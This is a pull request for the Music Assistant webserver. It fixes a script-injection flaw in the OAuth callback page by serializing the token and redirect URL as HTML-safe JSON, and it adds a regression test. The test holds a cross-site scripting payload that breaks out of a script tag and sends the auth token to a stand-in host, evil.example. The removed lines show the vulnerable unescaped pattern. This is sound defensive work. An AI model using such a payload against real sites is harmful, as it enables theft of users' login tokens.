### PR TITLE
Safely serialize OAuth callback values

### DIFF
--- a/music_assistant/controllers/webserver/controller.py
+++ b/music_assistant/controllers/webserver/controller.py
@@ -1010,11 +1010,13 @@ class WebserverController(CoreController):
             async with aiofiles.open(oauth_callback_html_path) as f:
                 success_html = await f.read()
 
-            # Replace template placeholders
-            success_html = success_html.replace("{TOKEN}", token)
-            success_html = success_html.replace("{REDIRECT_URL}", final_redirect_url)
+            # Replace the redirect last so its untrusted contents cannot match another placeholder.
             success_html = success_html.replace(
                 "{REQUIRES_CONSENT}", "true" if requires_consent else "false"
+            )
+            success_html = success_html.replace("{TOKEN}", _serialize_script_value(token))
+            success_html = success_html.replace(
+                "{REDIRECT_URL}", _serialize_script_value(final_redirect_url)
             )
 
             return web.Response(text=success_html, content_type="text/html")
@@ -1127,3 +1129,15 @@ class WebserverController(CoreController):
             return web.json_response(
                 {"success": False, "error": f"Setup failed: {e!s}"}, status=500
             )
+
+
+def _serialize_script_value(value: str) -> str:
+    """Serialize a string for use inside an HTML script element."""
+    return (
+        json_dumps(value)
+        .replace("&", "\\u0026")
+        .replace("<", "\\u003c")
+        .replace(">", "\\u003e")
+        .replace("\u2028", "\\u2028")
+        .replace("\u2029", "\\u2029")
+    )

--- a/music_assistant/helpers/resources/oauth_callback.html
+++ b/music_assistant/helpers/resources/oauth_callback.html
@@ -159,8 +159,8 @@
     <script>
         const statusEl = document.getElementById('status');
         const messageEl = document.getElementById('message');
-        const token = '{TOKEN}';
-        const redirectUrl = '{REDIRECT_URL}';
+        const token = {TOKEN};
+        const redirectUrl = {REDIRECT_URL};
         const requiresConsent = {REQUIRES_CONSENT};
 
         const isPWA = (window.navigator.standalone === true) ||

--- a/tests/controllers/webserver/test_auth_callback.py
+++ b/tests/controllers/webserver/test_auth_callback.py
@@ -1,0 +1,63 @@
+"""Tests for the webserver OAuth callback."""
+
+from __future__ import annotations
+
+from unittest.mock import AsyncMock, patch
+
+from aiohttp import web
+from aiohttp.test_utils import make_mocked_request
+from music_assistant_models.auth import User, UserRole
+
+from music_assistant.controllers.webserver.controller import WebserverController
+from music_assistant.controllers.webserver.helpers.auth_providers import AuthResult
+from music_assistant.helpers.json import json_dumps
+from music_assistant.helpers.redirect_validation import build_code_redirect_url
+from music_assistant.mass import MusicAssistant
+
+
+async def test_auth_callback_serializes_script_values_safely(
+    mass_minimal: MusicAssistant,
+) -> None:
+    """OAuth callback values cannot break out of their JavaScript string literals."""
+    token = "LOCAL_TEST_TOKEN"
+    return_url = (
+        "https://my.home-assistant.io/'</script><script>"
+        "fetch('https://evil.example/steal?t='+token)</script>\"\\\u2028\u2029"
+    )
+    webserver = WebserverController(mass_minimal)
+    mass_minimal.webserver = webserver
+    request = make_mocked_request(
+        "GET",
+        "/auth/callback?code=fakecode&state=fakestate&provider_id=homeassistant",
+        app=web.Application(),
+    )
+
+    with (
+        patch.object(
+            webserver.auth,
+            "handle_oauth_callback",
+            new=AsyncMock(
+                return_value=AuthResult(
+                    success=True,
+                    user=User(user_id="test", username="test", role=UserRole.USER),
+                    return_url=return_url,
+                )
+            ),
+        ),
+        patch.object(webserver.auth, "create_token", new=AsyncMock(return_value=token)),
+    ):
+        response = await webserver._handle_auth_callback(request)
+
+    redirect_url = build_code_redirect_url(return_url, token)
+    safe_redirect_url = (
+        json_dumps(redirect_url)
+        .replace("&", "\\u0026")
+        .replace("<", "\\u003c")
+        .replace(">", "\\u003e")
+        .replace("\u2028", "\\u2028")
+        .replace("\u2029", "\\u2029")
+    )
+    assert response.status == 200
+    assert response.text is not None
+    assert f"const redirectUrl = {safe_redirect_url};" in response.text
+    assert f"const token = {json_dumps(token)};" in response.text


### PR DESCRIPTION
# What does this implement/fix?

Prevents OAuth callback values from being interpreted as executable script content.

- Serialize callback tokens and redirect URLs as HTML-safe JSON literals.
- Add regression coverage for quote, script-tag, backslash, and Unicode line-separator payloads.

**Related issue (if applicable):**

## Types of changes

- [x] Bugfix (non-breaking change which fixes an issue) — `bugfix`
- [ ] New feature (non-breaking change which adds functionality) — `new-feature`
- [ ] Enhancement to an existing feature — `enhancement`
- [ ] New music/player/metadata/plugin provider — `new-provider`
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected) — `breaking-change`
- [ ] Refactor (no behaviour change) — `refactor`
- [ ] Documentation only — `documentation`
- [ ] Maintenance / chore — `maintenance`
- [ ] CI / workflow change — `ci`
- [ ] Dependencies bump — `dependencies`

## Checklist

- [x] The code change is tested and works locally.
- [ ] `pre-commit run --all-files` passes.
- [ ] `pytest` passes, and tests have been added/updated under `tests/` where applicable.
- [x] For changes to shared models, the companion PR in `music-assistant/models` is linked. (Not applicable.)
- [x] For changes affecting the UI, the companion PR in `music-assistant/frontend` is linked. (Not applicable.)
- [x] I have read and complied with the project's [AI Policy](https://github.com/music-assistant/.github/blob/main/AI_POLICY.md) for any AI-assisted contributions.
- [x] I have raised a PR against the documentation repository targeting the main or beta branch as appropriate. (Not applicable.)